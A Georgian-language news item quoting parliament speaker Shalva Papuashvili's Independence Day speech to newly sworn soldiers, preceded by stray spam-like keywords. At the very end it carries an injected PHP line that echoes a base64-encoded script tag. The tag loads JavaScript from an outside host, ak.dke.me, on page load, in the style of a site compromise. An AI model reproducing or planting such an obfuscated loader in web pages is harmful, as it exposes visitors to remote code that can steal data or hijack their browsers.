celsiusi
ავერსი საქკაბელი

 ჩვენ არასდროს შეგვშლია მტრისა და მეგობრის გარჩევა, მოყვარეს მუდამ მოყვრულად ვხვდებოდით, ხოლო მტრებისთვის „ავი მუსაიფები“ ვიყავით. ამ პრინციპით მოვედით დღემდე და ასე იქნება მომავალშიც, - ამის შესახებ საქართველოს პარლამენტის თავმჯდომარემ შალვა პაპუაშვილმა. დამოუკიდებლობის დღისადმი მიძღვნილ ღონისძიებაზე სიტყვით გამოსვლისას განაცხადა.

პარლამენტის თავმჯდომარის თქმით, ჩვენი სამშობლო ევროპასა და მსოფლიო ერთობაში თანასწორი ადგილის დამკვიდრებისკენ ისწრაფვის.

"ჯარისკაცებო, თქვენ დღეს დადეთ ფიცი ჩვენი სამშობლოს დროშის წინაშე და შეკარით პირობა, რომ იქნებით საქართველოს დამოუკიდებლობისა და მშვიდობის უპირველესი მცველები, დამოუკიდებელი საქართველოს ჯარისკაცები. დღეს თითოეული თქვენგანი შეუერთდა ქართულ ჯარს, რომელიც ჩვენი ეროვნული სულის, შეუპოვრობისა და სიმამაცის პირდაპირი გამოხატულებაა. დღეს თქვენ ხართ ქუჯის და ფარნავაზის, მირიანის და გორგასლის, დავითის, თამარის და ერეკლეს ჯარი; მათი ათასწლოვანი მხედრული ტრადიციების ღირსეული გამგრძელებელი. თქვენს უკან ჩვენი სამშობლოა და საქართველოს თითოეული მოქალაქისგან შემდგარი ლაშქარი. ჩვენ ყველას ერთი ეროვნული მისია გვაქვს: ჩვენი მამულის, ჩვენი ენის, ჩვენი სარწმუნოების დაცვა და განმტკიცება. ეს წმინდათაწმინდა მისიაა, რომელიც წინაპართაგან გადმოგვეცა და რომელსაც ვერასდროს ვერავინ ჩაგვინაცვლებს.

ჩვენ არასდროს შეგვშლია მტრისა და მეგობრის გარჩევა. მოყვარეს მუდამ მოყვრულად ვხვდებოდით, ხოლო მტრებისთვის „ავი მუსაიფები“ ვიყავით. ამ პრინციპით მოვედით დღემდე და ასე იქნება მომავალშიც. რამდენადაც დამოუკიდებლობა არის ეროვნული იდენტობის შენარჩუნების წინაპირობა, იმდენად ისწრაფვის ჩვენი სამშობლო ევროპასა და მსოფლიო ერთობაში თანასწორი ადგილის დამკვიდრებისკენ”, - განაცხადა შალვა პაპუაშვილმა.

180
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");